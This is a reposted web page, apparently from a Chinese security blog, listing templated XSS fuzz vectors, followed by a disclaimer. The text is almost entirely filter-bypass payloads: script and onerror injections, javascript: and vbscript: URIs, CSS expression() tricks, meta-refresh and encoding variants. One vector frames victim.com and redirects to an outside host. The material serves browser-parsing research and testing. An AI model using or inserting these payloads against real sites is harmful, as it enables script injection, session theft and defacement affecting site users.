onmouseover="x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx63x6Fx6Ex66x69x72x6Dx26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B">Save</command>*datajscsspropertynames*<script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/uk//.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://shazzer.co.uk*chr*break" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe><script>logChr(*num*)<*chr*script><script> lou*chr*0067Chr(*num*); </script><script> lo*chr*0067Chr(*num*); </script><!-- -*chr*-> <script>logChr(*num*)</script> --><script> logChr*chr*(*num*); </script><script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe><*chr*script> logChr(*num*) </script><script>logChr(*num*)*chr*'</script><script>logChr(*num*)/*chr*/'</script><script>logChr(*num*)<*chr*!-- '</script><script> var a = "*chr* "; logChr(*num*); </script><script> var a=*chr*'; logChr(*num*); </script><script> if(document.*chr*body === document.body) { logChr(*num*); } </script><script> var x = "*chr*"; logChr(*num*); </script><img src="1*chr* onerror="logChr(*num*)"><img src=*chr* onload=logChr(*num*)><script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"><img src=1 onerror="*chr*logChr(*num*)"><img src=1 onerror*chr*"logChr(*num*)"><svg><script>lo<*chr*>gChr(*num*)</script></svg><img src=# aaa*chr*onerror="logChr(*num*)"><*chr*a href=x onerror=logChr(*num*)><script> var x = "asdf*chr* asdf"; logChr(*num*); </script><img*chr*src=xx:xx*chr*onerror=logChr(*num*)><img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"><script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script><script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script><img src=x *chr*> onerror=logChr(*num*)><img src=x *chr*> onerror=logChr(*num*)><a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a><a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a><a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a><script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script><script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script><svg><script*chr*>logChr(*num*)</script></svg>htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){};<img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"><img src=xx:xx onerror=window[['log*chr*Chr']](*num*)><img src=xx:xx onerror=window[['logChr*chr*']](*num*)><a href="*chr*//google.com" id="fuzzelement*num*">test</a><a href="/*chr*/google.com" id="fuzzelement*num*">test</a><a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a><a href="http:*chr*google.com" id="fuzzelement*num*">test</a><a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a><a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a>"'><img src="xx:xx" on*chr*error="log(*num*);"><div id="fuzzelement*num*" expando*chr*="123">test</div><div id="fuzzelement*num*" expando*chr*=123>test</div><!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)><!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)><!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"><iframe src=http://businessinfo.co.uk onload="if(/^http://businessinfo.co.uk/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe><meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"><a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a><!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)><a href="*chr**chr*google.com" id="fuzzelement*num*">test</a><a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a><script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script><*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*>htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){};htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){};htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){};<*chr* script>logChr(*num*)</script><img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"><svg><script xlink:href=YWxl*chr*cnQoMSk= ></script><*chr*cript>logChr(*num*)</script>*chr*script>logChr(*num*)</script><scr*chr*ipt>logChr(*num*)</script><*chr*script>logChr(*num*)</script><img src=*chr* onload=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //">htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){};htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){};htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){};htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){};htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); }<div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div><img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'><img src='xx:x*chr* onerror="logChr(*num*)">'><img src='xx:x*chr* onerror="logChr(*num*)">'><*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script>`"'><img src="#*chr* onerror=log(*num*)><img src=xx:xx onerror="x='*chr*',logChr(*num*)//'"><script>alert(logChr(*num*))</*chr*script><script>alert(logChr(*num*))<*chr*/script><script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script><script>log(*num*)<*chr*script></script>--><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --><img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/s/.test('*uni*')&&logChr(*num*)"><img src=xx:xx onerror="!/./.test('*uni*')&&/s/.test('*uni*')&&logChr(*num*)"><img*chr*src=xx:xx*chr*onerror=logChr(*num*)><img src=xx:xx#*chr*/onerror=logChr(*num*)><img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`><img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"><*chr*script>alert(*num*)</script><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a><*datahtmlelements*><</*datahtmlelements*> <*datahtmlelements*/><</*datahtmlelements*><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http:*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http://*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='http:*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script><script> !function(){ var a = document.createElement('a'); a.href='/*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script><script>log(*num*,1</script*chr*//)</script><script>log(*num*,1</script*chr*/)</script><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni*<body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc*<div id="fuzzelement*num*" style="/***hex2*/;color:#000000;"></div><div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div><iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script><iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script><script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script><script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script><script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script><b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script><b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script><img src=# onerror*chr*"log(*num*)" ><title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title><div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div><div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div><div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div><div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div><div style="xss:expression(logChr(*num*))*hex2* junk"></div><div style="xss:expression(logChr(*num*))'*chr*junk"></div><div style="xss:expression(logChr(*num*))*chr**chr*junk"></div><div style="xss:expression(logChr(*num*))*chr*junk"></div><div style="xss:expression(logChr*chr**num*))">test</div><img src=1 title= x:xx*chr*/onerror=logChr(*num*)><script>if("x*chr*".length==2) { log(*num*);}</script><script>if("x*chr*".length==1) { log(*num*);}</script><img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)><script>if("x*chr*x" == "xx") { log(*num*);}</script><img src=x on*chr*Error="javascript:log(*num*)"/>"`'><script>lo*chr*g(*num*)</script>*chr*script>log(*num*)</script><script*chr*type="text/javascript">log(*num*);</script><b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script><script charset='*chr*>log(*num*)</script><script charset="*chr*>log(*num*)</script><script> "ud83du*hex4*".match(/.*<.*/) ? log(*num*) : null; </script><a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a><style></style*chr*<img src="about:blank" onerror=log(*num*)//></style><script>a='abc*chr*';log(*num*)//def';</script><*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*><*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*><*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*><*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*><script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script><div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script>"`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/><script>log(*num*)<*chr*script><!--*chr*<img src=xxx:x onerror=log(*num*)> --><script>log(*num*)</script*chr*<script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script><script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script><script*chr*>log(*num*)</script><div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div><div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div>"`'><sc*chr*ript>log(*num*)</sc*chr*ript>"/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /><img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)">*chr*script*chr* log(*num*) *chr**chr*script*chr*chr*script*chr alert(1) *chr**chr*script*chr`"'><img src='#*chr* onerror=log(*num*)><a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a><div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div><script>/* **chr*/log(*num*)// */</script>"'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF"'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF"'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script><a href="*chr*><script>log(*num*)</script>" />"'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p><p><svg><script>*chr*og(*num*)</script></p><p><svg><script>l*chr*og(*num*)</script></p><p><svg><script>*chr*log(*num*)</script></p><script> if ('*chr*'.replace(/s/g, '') === '') { log(*num*); } </script><script>log(*num*)<*chr*/script><iframe src="vbscript:log*chr**num*"></iframe><iframe src="vbs:log*chr**num*"></iframe>ABC<div style="x:expression*chr*(log(*num*))">DEFABC<div style="x:exp*chr*ression(log(*num*))">DEFABC<div style="x:*chr*expression(log(*num*))">DEFABC<div style="x*chr*expression(log(*num*))">DEF<script src="data:text/plain*chr*log(*num*)"></script><script src="data:*chr*,log(*num*)"></script><script src="data:text/plain,lo*chr*g(*num*)"></script><script> if ('*chr*'.trim() === '') { log(*num*); } </script>"'`><script>log*chr*(*num*)</script>"'`><*chr*img src=xxx:x onerror=log(*num*)>'`"><*chr*script>log(*num*)</script><a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a>`"'><img src=xxx:x onerror*chr*=log(*num*)>'"`><script>/* **chr*log(*num*)// */</script><a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a><a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a>`'"><script>window['log*chr*'](*num*)</script>'"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div>"`'><script>*chr*log(*num*)</script>--><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> -->`"'><img src=xxx:x *chr*onerror=log(*num*)>
原文始发于微信公众号(菜鸟小新):XSS: FUZZ VECTORS
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论